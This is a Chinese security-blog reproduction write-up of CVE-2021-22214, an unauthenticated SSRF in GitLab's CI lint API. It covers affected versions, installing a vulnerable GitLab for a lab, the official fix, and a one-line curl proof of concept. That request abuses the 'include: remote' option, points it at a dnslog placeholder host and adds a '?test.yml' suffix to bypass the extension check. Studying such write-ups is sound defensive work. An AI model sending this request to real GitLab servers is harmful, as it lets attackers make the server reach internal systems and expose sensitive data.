记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

CVE-2021-22214:Gitlab API未授权SSRF复现

2021-07-21 20:28


上方蓝色字体关注我们,一起学安全!
作者:L0ding@Timeline Sec
本文字数:696
阅读时长:2~4min
声明:仅供学习参考使用,请勿用作违法用途,否则后果自负


0x01 简介


GitLab是由GitLabInc.开发,使用MIT许可证的基于网络的Git仓库管理工具,具有issue跟踪功能。它使用Git作为代码管理工具,并在此基础上搭建起来的web服务。


0x02 漏洞概述


编号:CVE-2021-22214

Gitlab的CI lint API用于验证提供给gitlab ci的配置文件是否是yaml格式。而根据其说明文档文档,其include 操作支持remote选项,用于获取远端的yaml。因此在此处将remote参数设置为本地回环地址,同时由于后端会检查最后扩展名,加上?test.yaml 即可绕过。


远程攻击者可通过发送特殊构造的HTTP请求,欺骗应用程序向任意系统发起请求。攻击者成功利用该漏洞可获得敏感数据的访问权限或向其他服务器发送恶意请求。


0x03 影响版本


13.10.5 > GitLab >= 10.5

13.11.5 > GitLab >= 13.11

13.12.2 > GitLab >= 13.12


0x04 环境搭建


以阿里云centos7.3为例

首先先添加yum源,选择gitlab-ce社区版

curl -s https://packages.gitlab.com/install/repositories/gitlab/gitlab-ce/script.rpm.sh | sudo bash


接着需要更新下yum缓存

sudo yum makecache


接着获取源中的所有版本

yum list gitlab-ce --showduplicates|sort -r



此时选择存在漏洞的版本安装即可

yum install gitlab-ce-13.12.1-ce.0.el7


下载完成后使用命令gitlab-ctl reconfigure即可默认配置安装gitlab


0x05 漏洞复现


POC为:(使用时修改两处即可)

curl -s --show-error -H 'Content-Type: application/json' http://目标ip或者域名/api/v4/ci/lint --data '{ "include_merged_yaml": true, "content": "include:\n  remote: http://dnslog/api/v1/targets/?test.yml"}'






0x06 修复方式



当前官方已发布最新版本,建议受影响的用户及时更新升级到最新版本:

https://about.gitlab.com/releases/2021/06/01/security-release-gitlab-13-12-2-released/



阅读原文看更多复现文章
Timeline Sec 团队
安全路上,与你并肩前行














知识来源: https://mp.weixin.qq.com/s?__biz=MzA4NzUwMzc3NQ==&mid=2247488829&idx=1&sn=822afb29e82a82ee0c08fa833d7a32b4

阅读:136372 | 评论:0 | 标签:ssrf CVE API

想收藏或者和大家分享这篇好文章→复制链接地址

“CVE-2021-22214:Gitlab API未授权SSRF复现”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

黑帝公告 📢

永久免费持续更新精选优质黑客技术文章Hackdig,帮你成为掌握黑客技术的英雄

标签云 ☁